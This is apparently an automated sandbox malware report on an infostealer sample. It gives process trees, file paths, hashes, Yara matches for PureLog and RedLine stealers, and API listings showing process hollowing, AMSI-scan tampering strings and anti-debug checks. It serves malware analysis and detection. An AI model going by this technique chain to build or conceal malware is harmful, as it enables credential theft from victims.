Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:40:09
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2284, Parent PID: 1784

General

Target ID:	17
Start time:	14:40:09
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:40:09
Start date:	03/01/2025
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:40:17
Start date:	03/01/2025
Path:	C:\Users\Public\Libraries\Oupzhkpr.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Oupzhkpr.PIF"
Imagebase:	0x400000
File size:	1'242'624 bytes
MD5 hash:	EE363121466EE051042410AFFFEA28EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:40:18
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1560, Parent PID: 2232

General

Target ID:	22
Start time:	14:40:18
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:40:18
Start date:	03/01/2025
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:40:47
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:	0xea0000
File size:	665'670'656 bytes
MD5 hash:	1EC1BD626F8EA04635D66113E34C4733
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.6%
Total number of Nodes:	1623
Total number of Limit Nodes:	16

Executed Functions

Function 027D8BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB

Part of subcall function 027D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027D8668

GetThreadContext.KERNEL32(00000614,02821420,ScanString,028213A4,027DA77C,UacInitialize,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,UacInitialize,028213A4), ref: 027D9442

Part of subcall function 027D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D82C5

Part of subcall function 027D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 027D8529

Part of subcall function 027D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27

Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74

SetThreadContext.KERNEL32(00000614,02821420,ScanBuffer,028213A4,027DA77C,ScanString,028213A4,027DA77C,Initialize,028213A4,027DA77C,0000087C,003B3FF8,028214F8,00000004,028214FC), ref: 027DA157
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000614,00000000,00000614,02821420,ScanBuffer,028213A4,027DA77C,ScanString,028213A4,027DA77C,Initialize,028213A4,027DA77C,0000087C,003B3FF8,028214F8), ref: 027DA164

Part of subcall function 027D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
Part of subcall function 027D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
Part of subcall function 027D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A

Strings

NtReadVirtualMemory, xrefs: 027DA460
dbgcore, xrefs: 027DA559, 027DA56D
bcrypt, xrefs: 027DA3B8, 027DA3CC, 027DA3E0
BCryptVerifySignature, xrefs: 027DA3B3
sppc, xrefs: 027D91B6
advapi32, xrefs: 027DA545
BCryptRegisterProvider, xrefs: 027DA3DB
ScanBuffer, xrefs: 027D8D0C, 027D8D94, 027D912F, 027D9244, 027D92E1, 027D961A, 027D97A1, 027D9934, 027D9B19, 027D9C2E, 027D9DEC, 027D9F5C, 027DA0CF, 027DA2C3, 027DA4E1, 027DA627
NtSetSecurityObject, xrefs: 027DA6CF
I_QueryTagInformation, xrefs: 027DA540
NtOpenObjectAuditAlarm, xrefs: 027DA474, 027DA52C
NtOpenProcess, xrefs: 027DA6E3
SLGetLicenseInformation, xrefs: 027D919F
Initialize, xrefs: 027D8F2A, 027D9538, 027D96BF, 027D9AA8, 027D9D0A, 027D9E7A, 027D9FED, 027DA252, 027DA583
BCryptQueryProviderRegistration, xrefs: 027DA3C7
ntdll, xrefs: 027DA465, 027DA479, 027DA531, 027DA6D4, 027DA6E8
OpenSession, xrefs: 027D8BE9, 027D900C, 027D90BE, 027DA48F, 027DA5D5
MiniDumpReadDumpStream, xrefs: 027DA568
UacScan, xrefs: 027D8CB3, 027D8ECB, 027D94C7, 027D98C3, 027D9A37, 027DA1E1, 027DA679
UacInitialize, xrefs: 027D8E72, 027D91D3, 027D9352, 027D9456, 027D9852, 027D99C6, 027DA170
ScanString, xrefs: 027D8C42, 027D8DED, 027D8F9B, 027D93C3, 027D95A9, 027D9730, 027D9BBD, 027D9D7B, 027D9EEB, 027DA05E, 027DA349, 027DA3F6
MiniDumpWriteDump, xrefs: 027DA554

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1022112746-51457883
Opcode ID: b9a7d30440635ea959f75d1b7b86a50d7a3f77158cdfa88b6088c9f398d95038
Instruction ID: 3e5532080da9365b80b9d91f2c93d282f65584834caa51f57a13dee9c88713d7
Opcode Fuzzy Hash: b9a7d30440635ea959f75d1b7b86a50d7a3f77158cdfa88b6088c9f398d95038
Instruction Fuzzy Hash: CFE20F75A501199BDB12FB74CDB9BCE73FABF49310F2180A9E049AB214DB309E468F51

Function 027D8BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB

Part of subcall function 027D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027D8668

GetThreadContext.KERNEL32(00000614,02821420,ScanString,028213A4,027DA77C,UacInitialize,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,UacInitialize,028213A4), ref: 027D9442

Part of subcall function 027D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D82C5

Part of subcall function 027D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 027D8529

Part of subcall function 027D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27

Strings

NtReadVirtualMemory, xrefs: 027DA460
dbgcore, xrefs: 027DA559, 027DA56D
bcrypt, xrefs: 027DA3B8, 027DA3CC, 027DA3E0
BCryptVerifySignature, xrefs: 027DA3B3
sppc, xrefs: 027D91B6
advapi32, xrefs: 027DA545
BCryptRegisterProvider, xrefs: 027DA3DB
ScanBuffer, xrefs: 027D8D0C, 027D8D94, 027D912F, 027D9244, 027D92E1, 027D961A, 027D97A1, 027D9934, 027D9B19, 027D9C2E, 027D9DEC, 027D9F5C, 027DA0CF, 027DA2C3, 027DA4E1, 027DA627
NtSetSecurityObject, xrefs: 027DA6CF
I_QueryTagInformation, xrefs: 027DA540
NtOpenObjectAuditAlarm, xrefs: 027DA474, 027DA52C
NtOpenProcess, xrefs: 027DA6E3
SLGetLicenseInformation, xrefs: 027D919F
Initialize, xrefs: 027D8F2A, 027D9538, 027D96BF, 027D9AA8, 027D9D0A, 027D9E7A, 027D9FED, 027DA252, 027DA583
BCryptQueryProviderRegistration, xrefs: 027DA3C7
ntdll, xrefs: 027DA465, 027DA479, 027DA531, 027DA6D4, 027DA6E8
OpenSession, xrefs: 027D8BE9, 027D900C, 027D90BE, 027DA48F, 027DA5D5
MiniDumpReadDumpStream, xrefs: 027DA568
UacScan, xrefs: 027D8CB3, 027D8ECB, 027D94C7, 027D98C3, 027D9A37, 027DA1E1, 027DA679
UacInitialize, xrefs: 027D8E72, 027D91D3, 027D9352, 027D9456, 027DA170
ScanString, xrefs: 027D8C42, 027D8DED, 027D8F9B, 027D93C3, 027D95A9, 027D9730, 027D9BBD, 027D9D7B, 027D9EEB, 027DA05E, 027DA349, 027DA3F6
MiniDumpWriteDump, xrefs: 027DA554

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4113022151-51457883
Opcode ID: 82de45d4741441ef4b3ec3e50d28e787a54382e262fc1d34fa0405a19234bc59
Instruction ID: 890cbf7e4d3f7fe3ccecaedfe3372a73616c65c154e854b6e2456fe4aefebd5a
Opcode Fuzzy Hash: 82de45d4741441ef4b3ec3e50d28e787a54382e262fc1d34fa0405a19234bc59
Instruction Fuzzy Hash: F9E20F75A501199BDB12FB74CDB9BCE73FABF49310F2180A9E049AB214DB309E468F51

Function 027C5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,027C0000,027ED790), ref: 027C5A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027C5AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027C5B37
RegQueryValueExA.ADVAPI32(?,027C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001), ref: 027C5B55
RegCloseKey.ADVAPI32(?,027C5B84,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027C5B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027C5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027C5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027C5BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027C5BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027C5C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027C5C97

Strings

Software\Borland\Delphi\Locales, xrefs: 027C5AE4
Software\Borland\Locales, xrefs: 027C5AA8, 027C5AC6

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 6561acb95f4e5a0512e4a2c31c50434ca66fdec8d089b8c6b7f1f2b25ea40dd1
Instruction ID: 993b665b439d4eedb0845ad93ce8f79dd178b80dd279e03f39b4eeb830ce0e1d
Opcode Fuzzy Hash: 6561acb95f4e5a0512e4a2c31c50434ca66fdec8d089b8c6b7f1f2b25ea40dd1
Instruction Fuzzy Hash: 66518775A4020D7EFB21DAB4CC46FEFBBAD9B04744FA001ADA604F6181E775EA448F64

Function 027D87A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A

Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74

Strings

bcrypt, xrefs: 027D87B3
BCryptVerifySignature, xrefs: 027D87C7

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 808cef7e4cc1b356ec8d2a4716a318e964bc1eb001b98b3e4063da25c99017cd
Instruction ID: 2941d52d1fb84aac652bcdc1c6b409f6ffb4de0ae7f8e085afeba7ef4e25575c
Opcode Fuzzy Hash: 808cef7e4cc1b356ec8d2a4716a318e964bc1eb001b98b3e4063da25c99017cd
Instruction Fuzzy Hash: 08F0C879EC12145EEB20AB68AB4DF7633EE9380355F3A483DB11C976C2C77C04588B50

Function 027DEBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 027DEC00
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027DEC12
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027DEC29

Strings

KernelBase, xrefs: 027DEBFB
CheckRemoteDebuggerPresent, xrefs: 027DEC0C

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 31665a4f4f9e1ecb3edb2391ae248bcea48bdaf7e7be285cddad83e24b68851c
Instruction ID: 5a0d2ae169b805241a6908ec92c08060f9febd7a5cb8ba4d2733aa9f09014177
Opcode Fuzzy Hash: 31665a4f4f9e1ecb3edb2391ae248bcea48bdaf7e7be285cddad83e24b68851c
Instruction Fuzzy Hash: 02F0A0B090524CABEB23E7B8888D7ECFBB95B05328FA40798E428761C1E77506848651

Function 027DDBB0 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027C4EDA

RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDBEB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDC1B
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027DDC30
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027DDC5C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027DDC65

Part of subcall function 027C4C0C: SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: File$String$AllocCloseFreeInformationOpenQueryRead
String ID:
API String ID: 2659941336-0
Opcode ID: 5995310fb84b220f51548f9d6139c584a5ec827070fd7aa2518d43d097f09221
Instruction ID: f4a55e262d583f22ad6674d6c33ee8392bafc6096e05108ca52cb1f877f7ddab
Opcode Fuzzy Hash: 5995310fb84b220f51548f9d6139c584a5ec827070fd7aa2518d43d097f09221
Instruction Fuzzy Hash: 4621D372A503087AEB11EBE4CC5AFDEB7BDAF48B00F500465B600F71C0DAB4AA058B65

Function 027DE2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027DE436

Strings

ScanBuffer, xrefs: 027DE37F
OpenSession, xrefs: 027DE3D8
Initialize, xrefs: 027DE326

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
